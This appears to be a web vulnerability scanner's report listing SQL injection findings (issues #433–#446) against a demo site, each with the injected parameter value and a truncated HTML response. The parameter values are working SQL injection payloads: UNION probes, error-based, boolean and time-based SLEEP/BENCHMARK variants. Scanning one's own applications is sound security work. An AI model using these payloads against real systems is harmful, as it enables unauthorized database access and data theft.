href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #433\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #434\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #435\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND false\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #436\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #437\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io '%20and%201=2%20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #438\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+\nCHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (\n5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(\n113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #439\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA'))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #440\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #441Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iosleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #442\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iopg_SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #443\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')\n),4,5,6,7,8,9,10,11,12#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #444\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io %2c(select%20*%20from%20(select(sleep(10)))a)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #445\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' OR '' = '\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #446\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 